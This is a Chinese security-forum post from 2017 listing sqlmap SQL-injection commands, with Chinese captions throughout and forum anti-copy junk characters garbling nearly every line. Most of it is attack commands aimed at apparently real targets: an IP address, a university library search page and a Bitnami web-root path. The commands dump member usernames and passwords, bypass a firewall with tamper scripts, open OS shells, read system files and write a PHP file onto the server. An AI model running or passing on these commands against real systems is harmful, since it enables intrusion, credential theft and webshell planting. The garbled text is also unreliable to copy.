找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2200|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap* q% J5 C; D" I8 J; o, a

0 R* \( ^; B/ V/ z' ]update :::::>     in the folder   after  execute    following   order : svn update
& a# o% X9 U  ]  ~5 H. n3 C3 d; D* U0 G* g$ }- V/ T+ m
sqlmap.py -r 1.txt --current-db3 D3 L/ ?  u, ]0 C
( e  j. }/ s; Q; _
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”8 I5 _1 z, C4 X1 O0 Q: `
0 M  E! z6 a9 F: @0 o+ E
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 0 f* M; ^5 I7 B/ h6 O
猜解数据库) g+ D- A& Y5 h( }/ c
./sqlmap.py -u "injection-url" --dbs) _4 I5 e6 e+ Z; f
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"3 S/ N0 B. Z- c8 j; J

& v" ]3 }8 S2 k猜解表名8 L4 Y1 ]( Z6 M. W% U
./sqlmap.py -u "injection-url" -D database_name --tables8 @" v2 B+ d/ K4 j
. Q3 U* O, H* j; Z* P
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
, a# Q! |9 T# o* \! g9 Nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
( X- h2 L( }1 x5 [* e
# K! j! B  z5 Q1 Jsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
( ~" b, L/ d0 c3 R  i( d- M) U) D5 V
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
; y+ G: u* F: l# W, E$ Msqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
; }/ p$ `2 c# T& ^sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
! _" V, |, N8 e8 U( u5 l. Hsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
+ s/ X4 |7 f9 B  n
  v+ Y+ n* q; b! v$ ysqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
6 q0 t3 y. C# P6 a9 \sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"0 R: w; U: `& u( N! @
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
2 y) L9 e8 u: G$ \7 }  i' usqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
- |  e: A7 p" i5 b) Bsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
- O1 ~* J' R  |! p2 z
% z/ r5 i$ j( t' J- B0 V  L6 d4 z* rsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了! J" s2 h% R6 ?4 s! {# g' G
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"! a2 J; p4 G4 H# m' ~

: H& _  m/ q$ V/ C) osqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"! u: L4 C! t3 W
猜解列名
1 u! T2 U  V' W0 W./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
1 V5 I0 _$ O5 N2 x1 z1 s( ]# a0 N$ @0 Z# n) k9 v; e9 J2 ~* }- Z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
2 w4 w# V- d) L) O; h3 lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
4 X( H6 Y" ]4 N% ~' Q* `! D; |2 rsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"4 v' C* E7 w% R
9 c. Y( ?7 r; o& y& N, P
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
6 X6 }2 {6 Q) `& B, h. x& B&submit=Go* {: q3 a( t9 u
猜解值0 r( ^+ ~% H8 `9 }+ L
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump1 t# m( J& y) o; `+ ?
========================================================5 t; O- Q* u1 F; ]
搜索表名中包括mana字符的
6 u& M  w4 i* h3 N$ L) v. f/sqlmap.py -u "injection-url" -T mana --search* J! [( g( b5 J
返回一个交互式sql shell! G5 l) R5 ~/ r. M8 l! M$ P- K
/sqlmap.py -u "injection-url" --sql-shell. Y+ n% W) Z. u5 [9 x) R
读取指定文件(需权限)6 Q5 s% G5 \) _) ^/ |: V6 p% P
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"$ [# V; ?/ U. Q( b
查看当前 用户 及 数据库
. ^; A% @  ~$ p7 l% S/sqlmap.py -u "injection-url" --current-user --current-db
" Z* E7 \- U9 a, D本地文件 写入 远程目标绝对路径- n+ Z; f& k& f( P/ n2 }  X
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径8 R( D* E. E; s( ^5 ?+ ?" y
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 5 Z5 q. L- }8 s+ j

- W( a& P3 M; b6 k( J7 O& Vsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
# ?4 n2 U- ~7 ~: B1 _查看某用的权限4 h; v: A4 s0 J) u! T$ s7 L/ S8 b
/sqlmap.py -u "injection-url" --privileges -U root/ P+ h$ G5 `: I) _
查看当前用户是否为dba
; P7 W9 u/ C, O' @8 h4 T6 n/sqlmap.py -u "injection-url" --is-dba
. S( ]9 r* S0 t; P& W2 G1 E+ }& V读取所有数据库用户或指定数据库用户的密码/ `1 a1 r$ b7 N$ ^6 k. u2 p
sqlmap.py -r 1.txt --users --passwords% c* X' c% u" b; a5 a0 L: V3 D
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 4 p  M/ ?0 o* k* q, w0 U
' E+ }& V% [5 x- ]- V! s' |
/sqlmap.py -u "injection-url" --passwords -U root
4 X, c) {+ P5 c2 m# ^9 `/ {# F6 V+ R' j* J
--start&&--stop 与 --first&&--last 的区别: ~0 ?$ N, D( G" E" ]5 L2 S' e
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……). Y( X: |* N* F$ Y

5 a$ q8 g+ Z  W从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt). z) ^4 H2 z3 J
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
& q2 n# G1 F* w( {; X5 w5 O& {2 T8 l$ ~/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
& U& W! N+ K# y* j: T9 X
3 a; Z: x% }, D6 L2 O+ M+ }执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)4 o# L: y2 G0 X: x+ ]* N3 y5 Y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"( i! B, J8 _6 v. S$ e8 o7 x

2 v: m! c% |6 u$ L' M3 [% R1 R5 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表